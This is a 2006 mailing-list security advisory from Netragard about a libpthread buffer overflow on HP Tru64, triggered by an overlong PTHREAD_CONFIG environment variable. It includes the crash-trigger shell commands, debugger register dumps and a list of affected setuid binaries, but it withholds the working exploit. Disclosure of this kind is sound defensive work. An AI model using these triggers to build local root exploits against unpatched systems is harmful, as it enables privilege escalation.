[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [NETRAGARD-20061109 SECURITY ADVISORY] [HP Tru64 libpthread buffer overflow][http://www.netragard.com]



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************

                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."
        

[Advisory Information]
- ----------------------------------------------------------------------
Advisory ID             : NETRAGARD-20060810
Advisory Contact        : Adriel T. Desautels
Credit                  : Undisclosed
Product Name            : libpthread
Product Version         : 5.1b
Vendor Name             : Hewlet Packard
Type of Vulnerability   : Local Root Compromise
Effort                  : Very Difficult
Operating System        : Tru64
Other                   : Buffer Overflow

[Product Description]
- ----------------------------------------------------------------------
The pthread library (libpthread) provides interfaces for developing
multi-threaded applications.

[Technical Summary]
- ----------------------------------------------------------------------
libpthread suffers from a buffer overflow vulnerability which may
enable an attacker to execute arbitrary commands on the system. This
vulnerability may potentially be exploited by a creating a specially
crafted buffer and inserting it into the PTHREAD_CONFIG variable.

[Technical Details]
- ----------------------------------------------------------------------
libpthread reads in the PTHREAD_CONFIG environment variable. It may be
possible to exploit libpthread on HP's tru64 by creating a specially
crafted buffer. The details below do not contain the specially crafted
buffer. Exploitation of this specific vulnerability is very difficult.

##################################################################
#
#       Insert 273 A's (41) into the PTHREAD_CONFIG variable
#
##################################################################

OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)

##################################################################
#
#       Insert 274 A's (41) into the PTHREAD_CONFIG variable
#
##################################################################

bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8
ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc
ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48
ra=0x3ff805c8bf8 inst=0xa5090028

##################################################################
#
#       Run newaliases in gdb with the -q flag.
#
##################################################################

bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so

##################################################################
#
#       Execute a back trace (bt) within gdb
#
##################################################################

(gdb) bt
#0  0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1  0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2  0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable).  In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.

#
#       Execute Info Registers within gdb
#

(gdb) i r
v0             0x226    550
t0             0x11fff9b3e      4831812414
t1             0x0      0
t2             0x2      2
t3             0x0      0
t4             0x3ffc0081a00    4396973300224
t5             0x40     64
t6             0x7fffffe6       2147483622
t7             0x19     25
s0             0x4141414141414141       4702111234474983745
s1             0x11fff9c90      4831812752
s2             0x11fff9c88      4831812744
s3             0x0      0
s4             0x0      0
s5             0x11fff9ad8      4831812312
fp             0x1      1
a0             0xbf     191
a1             0x11fff9918      4831811864
a2             0x11fff96b0      4831811248
a3             0x11fff9b34      4831812404
a4             0x0      0
a5             0x11fff9b30      4831812400
t8             0x11fff9931      4831811889
t9             0x62     98
t10            0x49     73
t11            0x1      1
ra             0x3ff805c8bf8    4395905092600
t12            0x3ff801c1380    4395900867456
at             0x41416469       1094804585
gp             0x3ffc01c0170    4396974604656
sp             0x11fff98b0      4831811760
zero           0x0      0
fpcr           0x0      0
pc             0x3ff805c8bf8    4395905092600
vfp            0x11fff9900      4831811840

frame 2
v0             0x226    550
t0             0x11fff9b3e      4831812414
t1             0x0      0
t2             0x2      2
t3             0x0      0
t4             0x3ffc0081a00    4396973300224
t5             0x11fff9a50      4831812176
t6             0x7fffffe6       2147483622
t7             0x19     25
s0             0x1      1
s1             0x11fff9c90      4831812752
s2             0x11fff9c88      4831812744
s3             0x0      0
s4             0x0      0
s5             0x11fff9ad8      4831812312
fp             0x1      1

##################################################################
#
#       The following registers, a0, a1, a2, a3, a4, a5, have been
#       overwritten with A's (0x41).
#
##################################################################

a0             0x4141414141414141       4702111234474983745
a1             0x4141414141414141       4702111234474983745
a2             0x4141414141414141       4702111234474983745
a3             0x4141414141414141       4702111234474983745
a4             0x4141414141414141       4702111234474983745
a5             0x4141414141414141       4702111234474983745
t8             0x11fff9931      4831811889
t9             0x62     98
t10            0x49     73
t11            0x1      1
ra             0x3ff805bc4f8    4395905041656
t12            0x3ff801c1380    4395900867456
at             0x41416469       1094804585
gp             0x3ffc01c0170    4396974604656
sp             0x11fff9a80      4831812224
zero           0x0      0
fpcr           0x0      0
pc             0x3ff805bc4f8    4395905041656

##################################################################
#
#       Other binaries which are linked agianst libpthread.so
#       will also segfault when the PTHREAD_CONFIG variable
#       is set to a large string of A's. The following is
#       a list of some of those binaries
#
##################################################################

/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv

##################################################################
#
#       Sendmail Example. Loading sendmail core file with
#       the tru64 debugger.
#
##################################################################

bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"

warning: ./sendmail has no symbol table -- very little is
supported without it

signal Segmentation fault at >*[__putString, 0x3ff805c8bf8]     ldq
t0, 64(s0)
(dbx) where
>  0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918)
[0x3ff805c8bf8]
 1 __putFormatEol(0x4141414141414141, 0x4141414141414141,
0x4141414141414141, 0x4141414141414141, 0x4141414141414141)
[0x3ff805c8a74]
 2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4,
0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]

##################################################################
#
#       Older versions are also vulnerable...
#
##################################################################

Older versions are also vulnerable...
tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv

%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"

is not valid
Memory fault

Other binareis on 5.0
/usr/bin/ladebug

[Proof of Concept]
- ----------------------------------------------------------------------
Undislcosed

[Vendor Status]
- ----------------------------------------------------------------------
Vendor contacted patch released.


[About Netragard]
- ----------------------------------------------------------------------
Netragard offers specialized application, network security, and
managed security services which enable its clients to take a proactive
security stance. Each of our services is driven by security
professionals who specialize in  specific areas of Information
Security. This specialized focus differentiates Netragard from the
competition by enabling Netragard to produce deliverables which are
the product of skilled security professionals and not the product of
automated tools and scripts.

   [ For more information please visit http://www.netragard.com ]

[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com";>http://www.netragard.com</a>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (Darwin)

iD8DBQFFU/c7Qwbn1P9Iaa0RAs+GAJ494WKCsHlPEFjsL1Zy+hQtpsGVRQCfSdUL
eUqI/l8ML/I2/rKIDHvZ/k8=
=h9zy
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/